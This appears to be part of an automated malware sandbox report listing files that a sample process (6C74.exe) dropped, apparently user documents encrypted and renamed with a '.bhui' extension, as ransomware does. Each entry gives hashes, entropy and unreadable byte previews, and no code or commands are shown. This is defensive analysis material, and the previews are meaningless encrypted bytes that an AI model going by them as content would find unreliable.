SHA-512:	E8D35C110FE6CBE40EBDFABCCFCB62EC9239DD8CB2418623B17946E6F12BFEB9C3F048FAAB938CF3F9977448345DD423167AD6FDA6842B6DF0C313EBB36A1AAD
Malicious:	false
Reputation:	unknown
Preview:	GNLQNM.......5.<n...T.p[S[....B...e.s..6(.......t...yA...b\|.}F..tV. ..: .f..>.C@F.Y....E...=U....W..&E].C.....A9l.....NE..x........_..E...D.=.h.....u......h...9..j........b_..h.....>!.h(Ubm.J...yeQp....f.7#hy..."0U......r.L..e.`.9.F._......f...:..,...H...9.e.......%.\...H.......t.5.<.X....... .......!a.r..>(.. y.p.s5.fR....Ne...f....4.e.E..o..n....3>D.H.s~].]w.x~.../..!...<f...5...zh7.1..]m.k.wP.e0..#....X..,......!....sc......E...`....6K)b.t.L8.3..N.j.qT..j;aU...S....H.p.WA.7...5..1...L..C.;.=.P...0.".V..m.-S.....W..1.6.K..z.4E.d.....N`./....L&... ...fl.7..4..l3q9.....\|..\3.UP....ZY2.&....R.T.MD.p....7U\|Za..... f..Ci{..,..'.k+.....(.e..+'.gf.......>.F..C.}..4....R..}L.h..Q..Sn......f.cw.r...N.....t...1]..D.T..0X>...J.+SN...KE.d...o0Z...m.Z....2..<.q{0........&.6g....)...0&.KC....;..d.'.#g..;6jJH}..j..I.Z....LA)!...v.s..ZojA.*.+."....\|qp.X.W..E ...OQ...i.m...y._.W...9..ku.........n.s...l.,........V..7.j..........xp%K.T.\|.(

C:\Users\user\Desktop\NWCXBPIUYI\HQJBRDYKDE.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.841819544866196
Encrypted:	false
SSDEEP:	24:b2qoRnNhiqi1pYISLdZBjNbBi/my9MaItjwmEln31Ed2wCwf7wJWSm7oV/7gyiWX:6qUnNhqYNL9BbB1y9MaurGJJwjw47olN
MD5:	AB1EFB889871D80DDE84B68FF08B703E
SHA1:	59C50A8D17CDE467A06EDF6F6D9C100904929C92
SHA-256:	0D5E10FE49A70AB4B75B4BF182C0FD7CB7E5CEE926E851BEAD1F064C877ABBE1
SHA-512:	6CC8CF3BF11007396370E8FB672B26A4B7162C2FBFCA849739D9D1BF3EDD89D9EA58BD9E041AEF7FC11D240C47A96E71A01CFF01E53F1BC861BC0154BD497217
Malicious:	false
Reputation:	unknown
Preview:	HQJBR.....:.....5..,(._.5'Q..5C.E<G......B....\|....lg..M.a.....w..)...."..a((a.......Z....X..s.+.<....rE....N.q.4........J...S................Y6....v7.....F...."..E....Z..........UM..~...J=.....v..f......./v..L.K...Y..IR4"..R...7+.)$..[4X..4_o$...t.iOL..3.w..y.JF..R...)..%D.Cc+....<...7..Q\..w...:`f. k.....R)n...........XxuG.<G....,..e.n.{\|.h...y..\|..,...P.;.....n..L.....U...i..ao..2wAq...X\4.3S(.EJ.K...\%K_.%>....R...{..j.....a..FmO=..k^..<...8-.z`Y.....$..t....n.i.../Y.Q......7c.g..8.D.~.{....9....c..'...T.d/...........i..g5.=:.;..bzX..a`....).bC..t..3..az...-<.F.l...T..1.2.\..we.....)_Y.B..D6.XH..V....I.).H..NX0.X...R.o.Lb.._3.c.../*.g........)`-..P.....'#.&.c.G......%.U.Bx.)...q..c..)wi.+...S.[+..zhOq..H.l.....0..\|..J(Is\.....SU...{...1..~.Un..:,..[.;Yy..5...;2z.......Lk....... ..t.c.mx.b,..r.:..u.M....p.!=.g...%......O......dA.X.#/.%-c.&%bu..8aT..%v..R&......9..g....'4x.dA...#...Y.....w.X....QiY.....<M....8t@...k.t.}...

C:\Users\user\Desktop\NWCXBPIUYI\HQJBRDYKDE.jpg.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.841819544866196
Encrypted:	false
SSDEEP:	24:b2qoRnNhiqi1pYISLdZBjNbBi/my9MaItjwmEln31Ed2wCwf7wJWSm7oV/7gyiWX:6qUnNhqYNL9BbB1y9MaurGJJwjw47olN
MD5:	AB1EFB889871D80DDE84B68FF08B703E
SHA1:	59C50A8D17CDE467A06EDF6F6D9C100904929C92
SHA-256:	0D5E10FE49A70AB4B75B4BF182C0FD7CB7E5CEE926E851BEAD1F064C877ABBE1
SHA-512:	6CC8CF3BF11007396370E8FB672B26A4B7162C2FBFCA849739D9D1BF3EDD89D9EA58BD9E041AEF7FC11D240C47A96E71A01CFF01E53F1BC861BC0154BD497217
Malicious:	false
Reputation:	unknown
Preview:	HQJBR.....:.....5..,(._.5'Q..5C.E<G......B....\|....lg..M.a.....w..)...."..a((a.......Z....X..s.+.<....rE....N.q.4........J...S................Y6....v7.....F...."..E....Z..........UM..~...J=.....v..f......./v..L.K...Y..IR4"..R...7+.)$..[4X..4_o$...t.iOL..3.w..y.JF..R...)..%D.Cc+....<...7..Q\..w...:`f. k.....R)n...........XxuG.<G....,..e.n.{\|.h...y..\|..,...P.;.....n..L.....U...i..ao..2wAq...X\4.3S(.EJ.K...\%K_.%>....R...{..j.....a..FmO=..k^..<...8-.z`Y.....$..t....n.i.../Y.Q......7c.g..8.D.~.{....9....c..'...T.d/...........i..g5.=:.;..bzX..a`....).bC..t..3..az...-<.F.l...T..1.2.\..we.....)_Y.B..D6.XH..V....I.).H..NX0.X...R.o.Lb.._3.c.../*.g........)`-..P.....'#.&.c.G......%.U.Bx.)...q..c..)wi.+...S.[+..zhOq..H.l.....0..\|..J(Is\.....SU...{...1..~.Un..:,..[.;Yy..5...;2z.......Lk....... ..t.c.mx.b,..r.:..u.M....p.!=.g...%......O......dA.X.#/.%-c.&%bu..8aT..%v..R&......9..g....'4x.dA...#...Y.....w.X....QiY.....<M....8t@...k.t.}...

C:\Users\user\Desktop\NWCXBPIUYI\LFOPODGVOH.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.871141201179582
Encrypted:	false
SSDEEP:	24:r+PKF+QmnvqZMtmdhwTlOU7g08TSM4RnLNAVmsOuRuF1Lvp6WjVQ/RWbD:ruE2qZMwh8lOUwTSTA8DF1kSQGD
MD5:	36F3DE1613890BE45C8673FB7963DBD5
SHA1:	0997433FC482AB2C7E33B086434BB7CB58FCCBB1
SHA-256:	36F4277667CF45703AD0ED9CF6793768F1A8C01CEC5DF6469F518A25013EED5E
SHA-512:	87502E1256827E643B5032B87EE1C2ECBF52A0CB24DDF819567147070BE758FE4585A5A4F3A0812415B35B3840A64DF1B3385DABE1C27EE002CA97B1DA881C33
Malicious:	false
Reputation:	unknown
Preview:	LFOPO.....4+..u.k..z.3..,2.X......#...(...m....^./....k.d...(?m.a..q0..8...........pR......,...N.mA..........&,.,.=..q...L.{...Wi..PY/Z..h.....G.J...%....e........)S..5......t...Rg....q..8XJ..u`...[~v.......E...F..J...Q.5.`...i.p..Umy..k..c..&3.......1.....Q.Fov7.f..'......X.fv..$pJ.I......;>.[.Yb8..j.jO....dD...}.X..jH.C.....<(...1...y....dK2 ...yI..v.bi.f.{.P...Z..r....\..".....P}I..j.i.6.g.1..c{.-..P>..3.%....a...a.\. .Q../F...:.K.H...~!..n.yN..q..OW.......#F..~#\.T......H.B.U..56..\.B............J{.5.nsxZ..)..+..3.8.. ..RyN....z."Yh1:e>...Yj....c...M/.>...W1..F...8...."..X.lX..(...9z\...1.l...O.....M...w.......cT..<.G..:.....b...?....6...>.N.........r.EHeFV..K...0h.9W..an..B..N`.%.o...wiS......5]..U5..7.4.X...o.0..S..Bm..xs..3HU_.Hm.f.'Ck.....'uLf.......dr.A/!\.mt\|.bp.w....~......(gH..meE+}..?.\'."..g.Gs?.Z....-{.h\.x0.^.6.8..V..z.CH.q......p4..c..=.......f.q.......^....H.BtX\|../....fup..V.......cV.9.@..U..T..eI......M1U.

C:\Users\user\Desktop\NWCXBPIUYI\LFOPODGVOH.xlsx.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.871141201179582
Encrypted:	false
SSDEEP:	24:r+PKF+QmnvqZMtmdhwTlOU7g08TSM4RnLNAVmsOuRuF1Lvp6WjVQ/RWbD:ruE2qZMwh8lOUwTSTA8DF1kSQGD
MD5:	36F3DE1613890BE45C8673FB7963DBD5
SHA1:	0997433FC482AB2C7E33B086434BB7CB58FCCBB1
SHA-256:	36F4277667CF45703AD0ED9CF6793768F1A8C01CEC5DF6469F518A25013EED5E
SHA-512:	87502E1256827E643B5032B87EE1C2ECBF52A0CB24DDF819567147070BE758FE4585A5A4F3A0812415B35B3840A64DF1B3385DABE1C27EE002CA97B1DA881C33
Malicious:	false
Reputation:	unknown
Preview:	LFOPO.....4+..u.k..z.3..,2.X......#...(...m....^./....k.d...(?m.a..q0..8...........pR......,...N.mA..........&,.,.=..q...L.{...Wi..PY/Z..h.....G.J...%....e........)S..5......t...Rg....q..8XJ..u`...[~v.......E...F..J...Q.5.`...i.p..Umy..k..c..&3.......1.....Q.Fov7.f..'......X.fv..$pJ.I......;>.[.Yb8..j.jO....dD...}.X..jH.C.....<(...1...y....dK2 ...yI..v.bi.f.{.P...Z..r....\..".....P}I..j.i.6.g.1..c{.-..P>..3.%....a...a.\. .Q../F...:.K.H...~!..n.yN..q..OW.......#F..~#\.T......H.B.U..56..\.B............J{.5.nsxZ..)..+..3.8.. ..RyN....z."Yh1:e>...Yj....c...M/.>...W1..F...8...."..X.lX..(...9z\...1.l...O.....M...w.......cT..<.G..:.....b...?....6...>.N.........r.EHeFV..K...0h.9W..an..B..N`.%.o...wiS......5]..U5..7.4.X...o.0..S..Bm..xs..3HU_.Hm.f.'Ck.....'uLf.......dr.A/!\.mt\|.bp.w....~......(gH..meE+}..?.\'."..g.Gs?.Z....-{.h\.x0.^.6.8..V..z.CH.q......p4..c..=.......f.q.......^....H.BtX\|../....fup..V.......cV.9.@..U..T..eI......M1U.

C:\Users\user\Desktop\NWCXBPIUYI\NIRMEKAMZH.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.853408287176584
Encrypted:	false
SSDEEP:	24:jS1gG+Tl2VpTLUjdcbZlA83KoSzYXfdOsHSarKK8JjJPvc5bTWGwcYWbD:4Mtc89NMOs1KHpJMEGw2D
MD5:	AEEDF678F26D778D70B3BE42F079B6FB
SHA1:	A0338D6BBC33DC9CC670D3D92423AF5272307689
SHA-256:	CEBF57E00565726C8B4B03271F0AD84EE3944D0AF7DDDCBF8E86E653C9803024
SHA-512:	E3011F88AA778CE0BAF83D74DD1BF191C110F4CC7BB71A0236D13ACA190A09FFDD019CCD1FD019933D8C3BCE77AC5B5F2C62727034A16FCE7490098DD4D630B1
Malicious:	false
Reputation:	unknown
Preview:	NIRME....<l....i..:.....aX...1F...;..Nb.-..k!../iX........mLq..E..3..EW....... .P...#....C.(..#5)Pp..<ZNM'-a8Ig.7.....w.7A..z.J...)a...+.!C..k.f.)..e..&.5....i......<..[.2.<...V..C.CW..r...\.qS\.......a.m.a<Vn0.l1..:.>&.D...j..a.2.....tS.x.HC.n....@...eM.n2L=....fW49f..{.f.vx.....+f..=..o......7.UJ..H.J..o....F..}&&..EO.%.U...o~.U....U...d.\...y....o\|.S............m.?.Z..g.Q.1.....<)...q\7b^g/.<..L..{..q...S..k..j....=L.s...00$Hg...#...u.y.......B..xK".\|Y6...[U.6....mL.n..`4.\..;..x...2.(k.H=..-...j..X."@...Xi.+..p.l.D..]......pv............y....._$....QkdI...2..[..].X.Z..fG..N...X.l...].\|..!JY...=.....@.3...9s...}w.e.G..Z.!\mJ...{....dWvB.../.N...H...d..b.D.5^-..^.8.I85.Z..^.....t.:.......c..~......(.M}..OJ..../F2......CH.)NJ..G..<.?.;.r..:.[....G..^..6..1n.vR1.d.1..w........j$....6......-...f...R..x.L..~.....Uh.X.......n%...=.k...<\.MV..o.]7..b..v.....3l.(...\...".t.g.+W......_\|..l.g...A>Og.R0N0..t....a.l..;.=.N..e..-..h..<.

C:\Users\user\Desktop\NWCXBPIUYI\NIRMEKAMZH.png.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.853408287176584
Encrypted:	false
SSDEEP:	24:jS1gG+Tl2VpTLUjdcbZlA83KoSzYXfdOsHSarKK8JjJPvc5bTWGwcYWbD:4Mtc89NMOs1KHpJMEGw2D
MD5:	AEEDF678F26D778D70B3BE42F079B6FB
SHA1:	A0338D6BBC33DC9CC670D3D92423AF5272307689
SHA-256:	CEBF57E00565726C8B4B03271F0AD84EE3944D0AF7DDDCBF8E86E653C9803024
SHA-512:	E3011F88AA778CE0BAF83D74DD1BF191C110F4CC7BB71A0236D13ACA190A09FFDD019CCD1FD019933D8C3BCE77AC5B5F2C62727034A16FCE7490098DD4D630B1
Malicious:	false
Reputation:	unknown
Preview:	NIRME....<l....i..:.....aX...1F...;..Nb.-..k!../iX........mLq..E..3..EW....... .P...#....C.(..#5)Pp..<ZNM'-a8Ig.7.....w.7A..z.J...)a...+.!C..k.f.)..e..&.5....i......<..[.2.<...V..C.CW..r...\.qS\.......a.m.a<Vn0.l1..:.>&.D...j..a.2.....tS.x.HC.n....@...eM.n2L=....fW49f..{.f.vx.....+f..=..o......7.UJ..H.J..o....F..}&&..EO.%.U...o~.U....U...d.\...y....o\|.S............m.?.Z..g.Q.1.....<)...q\7b^g/.<..L..{..q...S..k..j....=L.s...00$Hg...#...u.y.......B..xK".\|Y6...[U.6....mL.n..`4.\..;..x...2.(k.H=..-...j..X."@...Xi.+..p.l.D..]......pv............y....._$....QkdI...2..[..].X.Z..fG..N...X.l...].\|..!JY...=.....@.3...9s...}w.e.G..Z.!\mJ...{....dWvB.../.N...H...d..b.D.5^-..^.8.I85.Z..^.....t.:.......c..~......(.M}..OJ..../F2......CH.)NJ..G..<.?.;.r..:.[....G..^..6..1n.vR1.d.1..w........j$....6......-...f...R..x.L..~.....Uh.X.......n%...=.k...<\.MV..o.]7..b..v.....3l.(...\...".t.g.+W......_\|..l.g...A>Og.R0N0..t....a.l..;.=.N..e..-..h..<.

C:\Users\user\Desktop\NWCXBPIUYI\NWCXBPIUYI.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.865573542376054
Encrypted:	false
SSDEEP:	24:5iMHPw+sxlBb7tl0ilm+V2RUi6b/X+Yk8aMhveJ1npHwrxOv4NWbD:5HHPwN/Bbhlbw+JmYkkhveJ1dBD
MD5:	1492B32C83ED74A799CC71EA7FDBE8C4
SHA1:	FDBFEAB7B603A283FFCAA794F7D607483E2BEE11
SHA-256:	CFD4E4A1DC9F9D4543E9F05DB4BDCD49EF0EB4A3ECA4DE15F24B0B6B112759E4
SHA-512:	FFB8E27E0CC29B24E0FFF555A257951F82B5643090B3BC9889E784E8136496DE386DA5DCCCE344EDFB903CF855B383F5F478437A2859DC601CCB4A5F48F7F0FA
Malicious:	false
Reputation:	unknown
Preview:	NWCXB.0...1Z...-.KNF.J..sj=l8Y?...w..n..p'[..!.h7..T..cm..,.....u....<..^..`.H..6..Bp:%....F..h.._........3?9..)i.B.nX;v..pFk...J.>...,S..\.!..L\|.I...rV..^.+.kh...]..y...#j<...6.4L..#..&:F..".J\.....D..g...uH.;.....\|W.Mu4}.........9....6~.V.UJ3..+...$.....J...?...6.mX.#..i{.;(..}..J.Y..,.X./.."g..O.....`..EG.....q.K..:8.AJ....U.4O.S..........1e..B=XLMZ...$~..&=.PE.#.I...(3A).u.....t.$RY..b..'g.?tr...C.....R)...n....I.Gi..C.x.`8@.7.p..}.)..G.q.^.B..d...^....T../......i....1.g5Sqa._.@2n.xs<.VX.@.._....E..&t......<.g..L.w.Z.S?.... ...>..Rfnj....D..'..a..N......+.U(a.....b(...Q1Gi.._..(].@e9.)7JN+..r._#9.{<...?Y.L.g..R.%dl.+v.XV..G......w8T.'.g.}3,8.....3.`e.sn..Y........-Iw.-....\L.l#..QY...T...s..0.....wT^.....6....a.aV.A}../.i.sg...M.K#+...W.s]......B..%..\|.x.[..F..c.b.....2.u...F..I.\.y.7".@z..QZn.N3.?.".....g.r.......u...I.$..........'G..P...p.h.@...=............M....Yq.i...Z?bz5...d.....z..9....*v.wQ."...g....T....(..`..x~....

C:\Users\user\Desktop\NWCXBPIUYI\NWCXBPIUYI.docx.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.865573542376054
Encrypted:	false
SSDEEP:	24:5iMHPw+sxlBb7tl0ilm+V2RUi6b/X+Yk8aMhveJ1npHwrxOv4NWbD:5HHPwN/Bbhlbw+JmYkkhveJ1dBD
MD5:	1492B32C83ED74A799CC71EA7FDBE8C4
SHA1:	FDBFEAB7B603A283FFCAA794F7D607483E2BEE11
SHA-256:	CFD4E4A1DC9F9D4543E9F05DB4BDCD49EF0EB4A3ECA4DE15F24B0B6B112759E4
SHA-512:	FFB8E27E0CC29B24E0FFF555A257951F82B5643090B3BC9889E784E8136496DE386DA5DCCCE344EDFB903CF855B383F5F478437A2859DC601CCB4A5F48F7F0FA
Malicious:	false
Reputation:	unknown
Preview:	NWCXB.0...1Z...-.KNF.J..sj=l8Y?...w..n..p'[..!.h7..T..cm..,.....u....<..^..`.H..6..Bp:%....F..h.._........3?9..)i.B.nX;v..pFk...J.>...,S..\.!..L\|.I...rV..^.+.kh...]..y...#j<...6.4L..#..&:F..".J\.....D..g...uH.;.....\|W.Mu4}.........9....6~.V.UJ3..+...$.....J...?...6.mX.#..i{.;(..}..J.Y..,.X./.."g..O.....`..EG.....q.K..:8.AJ....U.4O.S..........1e..B=XLMZ...$~..&=.PE.#.I...(3A).u.....t.$RY..b..'g.?tr...C.....R)...n....I.Gi..C.x.`8@.7.p..}.)..G.q.^.B..d...^....T../......i....1.g5Sqa._.@2n.xs<.VX.@.._....E..&t......<.g..L.w.Z.S?.... ...>..Rfnj....D..'..a..N......+.U(a.....b(...Q1Gi.._..(].@e9.)7JN+..r._#9.{<...?Y.L.g..R.%dl.+v.XV..G......w8T.'.g.}3,8.....3.`e.sn..Y........-Iw.-....\L.l#..QY...T...s..0.....wT^.....6....a.aV.A}../.i.sg...M.K#+...W.s]......B..%..\|.x.[..F..c.b.....2.u...F..I.\.y.7".@z..QZn.N3.?.".....g.r.......u...I.$..........'G..P...p.h.@...=............M....Yq.i...Z?bz5...d.....z..9....*v.wQ."...g....T....(..`..x~....

C:\Users\user\Desktop\NWCXBPIUYI\VWDFPKGDUF.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.832781638053065
Encrypted:	false
SSDEEP:	24:CeoP3H4+yJus8lZ6oGhlLYDjjqKgjzOgZp3Bj9zf6ecgpQEir+yMIXj5XWbD:Go+yJu3dalcjqbp119Nir+yzXN0D
MD5:	E2B2DE4D4D1EF66C4BB8E32CE945F22C
SHA1:	C345C0057A257102140B4656996D3F257A021F1B
SHA-256:	CAD6520F141DCF26100FFBA6956CD757C28D24366276DBB030528C245BBA865C
SHA-512:	EE6B1F98D3ED776D7B3AF4A909DB8AB6E75C0D238299476BDA9CD9CC06C13511795F54E63CCA12790532FDC40B2842B173F6E0B92B49AB58E7015CB2201297F7
Malicious:	false
Reputation:	unknown
Preview:	VWDFP..}..Zg...Db..6`m!F..-..X.%..m........4.m5.@A4..@.fK?..>~8!..x..miv#...\...^oh...zx.h..!s..+D..~v_....a..............?H........)G.1..3.M....VY.?3.eTx......GQr...{h...U.......l.70R.HF......J.z.ev..I5..j........D~}hF.[.8./....r..$P.....SX..)%..n..&.?oZT.Q..R.6.&3..I..Hkf.?.....`...!.g3E....s.....Uf..:.^'kF...@.Q...;...%.....]XT.F.<..k...+..}...}..L.ru......%B...KT'q+.)....4!.........=.. ..Pm^^....F,.c......C....k&g...F..............b..h+.%lT.Q.../...I\|.xJ2._......$..[....\...+_w_^..B.".k&.2ac.8S.R....A....1......'.r-.x6..^..{NT......>Z4.sM.~...#..@S.F(.!.A...M.2...Kt....y.<72...y....R...j...y....+..L.h.q......Z..yLE\...y....+w%.Z.N%...GG.Zdp?.Q....eX.{.C...M7s..D#d%..N'W...y....W.^...N...P.`..g....8...%Y.9I.i........K.J}...]..:a .S+G..&.q.&...(..t......g1H}..i..H....(.DXv'Y...uL.O...y}%......QP....t.W.}....J....eg.hLsQ..!......~w..:P.-T..D..zTz*...hgp..x'.:"..u@.$...Dv.:8dj..........;DS/H.".\|-..\O...N..'..iu~3..a.c.......

C:\Users\user\Desktop\NWCXBPIUYI\VWDFPKGDUF.pdf.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.832781638053065
Encrypted:	false
SSDEEP:	24:CeoP3H4+yJus8lZ6oGhlLYDjjqKgjzOgZp3Bj9zf6ecgpQEir+yMIXj5XWbD:Go+yJu3dalcjqbp119Nir+yzXN0D
MD5:	E2B2DE4D4D1EF66C4BB8E32CE945F22C
SHA1:	C345C0057A257102140B4656996D3F257A021F1B
SHA-256:	CAD6520F141DCF26100FFBA6956CD757C28D24366276DBB030528C245BBA865C
SHA-512:	EE6B1F98D3ED776D7B3AF4A909DB8AB6E75C0D238299476BDA9CD9CC06C13511795F54E63CCA12790532FDC40B2842B173F6E0B92B49AB58E7015CB2201297F7
Malicious:	false
Reputation:	unknown
Preview:	VWDFP..}..Zg...Db..6`m!F..-..X.%..m........4.m5.@A4..@.fK?..>~8!..x..miv#...\...^oh...zx.h..!s..+D..~v_....a..............?H........)G.1..3.M....VY.?3.eTx......GQr...{h...U.......l.70R.HF......J.z.ev..I5..j........D~}hF.[.8./....r..$P.....SX..)%..n..&.?oZT.Q..R.6.&3..I..Hkf.?.....`...!.g3E....s.....Uf..:.^'kF...@.Q...;...%.....]XT.F.<..k...+..}...}..L.ru......%B...KT'q+.)....4!.........=.. ..Pm^^....F,.c......C....k&g...F..............b..h+.%lT.Q.../...I\|.xJ2._......$..[....\...+_w_^..B.".k&.2ac.8S.R....A....1......'.r-.x6..^..{NT......>Z4.sM.~...#..@S.F(.!.A...M.2...Kt....y.<72...y....R...j...y....+..L.h.q......Z..yLE\...y....+w%.Z.N%...GG.Zdp?.Q....eX.{.C...M7s..D#d%..N'W...y....W.^...N...P.`..g....8...%Y.9I.i........K.J}...]..:a .S+G..&.q.&...(..t......g1H}..i..H....(.DXv'Y...uL.O...y}%......QP....t.W.}....J....eg.hLsQ..!......~w..:P.-T..D..zTz*...hgp..x'.:"..u@.$...Dv.:8dj..........;DS/H.".\|-..\O...N..'..iu~3..a.c.......

C:\Users\user\Desktop\NYMMPCEIMA.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.855612157097741
Encrypted:	false
SSDEEP:	24:juMJIYNku2lEsDO5RuIwSI4x6jIksK5i37WbD:juiIYNkla53dx4bD
MD5:	5334FFD3D48B28F1331F57F1FCEADA33
SHA1:	83C567B0AF416C8E8699EB74F1738A02D8EF0A0F
SHA-256:	BDC9458DFCDA5AA0E4CACC87EB5C333A197BD532FF53636F0C69334030B18E8F
SHA-512:	0C62568121BDA37B5DFF0C4CA63A6A506011367450A6EC68DA00ADB6B76DF362F17AFDFAF9AFFBFF0A49197E9A1FEE494E132E1B9FC6A0A32B76C10D0E819A38
Malicious:	false
Reputation:	unknown
Preview:	NYMMP..5Y:r2.M..........L.P...T.h.......Tw.c.-..r.%..4..u.....h..._x.....`.q...u.m"..U,p.S..vly..@...Cj..K..4TsDj..%..$T%..c..)"..V3l......#.C2.......B'...Mz..[]}7.Vm....U\|.>..W...l.h.....Z.EQH4FS.Cx..~l.....L....-Xs6..~....`.W/9.'l-\.Z....5Mn...x..P...h...n.......-\_.:.7i=O...b..!rt....^._L.. ......ojA_...a.r..+...............3...Zo........2..ax.D.z*..8..s.9x...r.............1Q6.h.P.....neO..[....eE...O.y.ys@...}.S.......V.m.H...^..x.-..X.m.+..^.......E...tSw.U2......d....G.n.(....F.Z...'.q-\PB.f..u...UKt.D........"?t&...i.T.jW..g?...k.5.'7~..o.h.Cg....a.@H.u..........un..T.%2m.....7..F...K.;..iHR..8qj.+..t...k.....d].7.....l... ..;....j. ....}...-.$...&/2.2s..a...$...%.@...wW=....-.=...Qs')d>.....#.../G...$..s.f.....Z.S.0p....$.pw.O.......g..)...F,j1q..r..!....x.(H.c...#JH.2.%.-...W.c,{.B-..H.,....(O....k.......;.1.:.X..{....`i.Z.;Q.5......L..Z.........X........m...n.;.....m..'....$...\rn..A...k.-zOl.....(............7m..}.yT.7vu.....

C:\Users\user\Desktop\NYMMPCEIMA.docx.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.855612157097741
Encrypted:	false
SSDEEP:	24:juMJIYNku2lEsDO5RuIwSI4x6jIksK5i37WbD:juiIYNkla53dx4bD
MD5:	5334FFD3D48B28F1331F57F1FCEADA33
SHA1:	83C567B0AF416C8E8699EB74F1738A02D8EF0A0F
SHA-256:	BDC9458DFCDA5AA0E4CACC87EB5C333A197BD532FF53636F0C69334030B18E8F
SHA-512:	0C62568121BDA37B5DFF0C4CA63A6A506011367450A6EC68DA00ADB6B76DF362F17AFDFAF9AFFBFF0A49197E9A1FEE494E132E1B9FC6A0A32B76C10D0E819A38
Malicious:	false
Reputation:	unknown
Preview:	NYMMP..5Y:r2.M..........L.P...T.h.......Tw.c.-..r.%..4..u.....h..._x.....`.q...u.m"..U,p.S..vly..@...Cj..K..4TsDj..%..$T%..c..)"..V3l......#.C2.......B'...Mz..[]}7.Vm....U\|.>..W...l.h.....Z.EQH4FS.Cx..~l.....L....-Xs6..~....`.W/9.'l-\.Z....5Mn...x..P...h...n.......-\_.:.7i=O...b..!rt....^._L.. ......ojA_...a.r..+...............3...Zo........2..ax.D.z*..8..s.9x...r.............1Q6.h.P.....neO..[....eE...O.y.ys@...}.S.......V.m.H...^..x.-..X.m.+..^.......E...tSw.U2......d....G.n.(....F.Z...'.q-\PB.f..u...UKt.D........"?t&...i.T.jW..g?...k.5.'7~..o.h.Cg....a.@H.u..........un..T.%2m.....7..F...K.;..iHR..8qj.+..t...k.....d].7.....l... ..;....j. ....}...-.$...&/2.2s..a...$...%.@...wW=....-.=...Qs')d>.....#.../G...$..s.f.....Z.S.0p....$.pw.O.......g..)...F,j1q..r..!....x.(H.c...#JH.2.%.-...W.c,{.B-..H.,....(O....k.......;.1.:.X..{....`i.Z.;Q.5......L..Z.........X........m...n.;.....m..'....$...\rn..A...k.-zOl.....(............7m..}.yT.7vu.....

C:\Users\user\Desktop\NYMMPCEIMA.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.826125740510951
Encrypted:	false
SSDEEP:	24:12zgn9uNOssKyt78CaddaYPYNSOKzWhuOWu6w4WBEFEdnjbWbD:u1NyKytMdFYN9w+v8w4WyFERjoD
MD5:	48A27F98D7BB46E8B93BD183905B3A2B
SHA1:	C8EC4FC8B40E5E4FEA3FCC2F95419DF5EC8CF824
SHA-256:	9017B352D71656BA651484D00601CD6364F9273486BD4C57C77C7AF73D0BD941
SHA-512:	8F8CDF17D7E0E79CBF2EFCCD8A161018A2607C4CE3A1F92A8A341F7C7317B3E9683BF0B2B550C6E6D918AE3A0CFF58F3410FD1592C5350BBF0D29564EB6F6AAB
Malicious:	false
Reputation:	unknown
Preview:	NYMMP.e.o^...-:......w..91?..\|T\|..;..+...A...#M.h.kx.Z.s.............f....k..s{.D.P..p...!....D.wfZ..2i.7..09 ...J......,..c(XOs....z..&.......r ...i.....jJZ..8l..}".Ge....c...]...9-Hk........'4.........C.......7%$.U.3.8g.}....5..w..>...D~.^!g./j..-.5..5..)....EMm...(d.6..B.........lI.?28..U....n.?.C.$....1.........c...sIn.......W...._.\2~.......U..J....2.....F9.w.%Q..M....)......p.....?V.C..m\|nv.7.8.".....X=...}....Vk..Fu.....!..eFz.....:..../.h.@7..S.X.>.....#.o/_..{.)..4.D..d.^....p.b.H\|.....Y......fJ.;.\|...i......c.L.(.c=a...+..7'....YNSUt.....8.4.~E....)....._.n.}5b...cY.........^.pP..N.....5L.."]W..'.6F.'.w/_.3"..z...D.%.6.+.mf{?.....G......\.cU..E.L..C..W......B........-n@1..+...;..(.n..........,l..E.....l....;..O.......Y.E.....2.....]8..Y.(.qr-..Bz..~%.b..@.9@....f...v..Y.\u.Kg..;+,\|.]bCl...........U...i\|. .8...l.r....o.r.2)...".J:].g.v..mH..)5....]./)\....X..Y#.w.?.8...^..........E?i.F.........z.C.E..}.g..dt.....F..bj.(.

C:\Users\user\Desktop\NYMMPCEIMA.xlsx.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.826125740510951
Encrypted:	false
SSDEEP:	24:12zgn9uNOssKyt78CaddaYPYNSOKzWhuOWu6w4WBEFEdnjbWbD:u1NyKytMdFYN9w+v8w4WyFERjoD
MD5:	48A27F98D7BB46E8B93BD183905B3A2B
SHA1:	C8EC4FC8B40E5E4FEA3FCC2F95419DF5EC8CF824
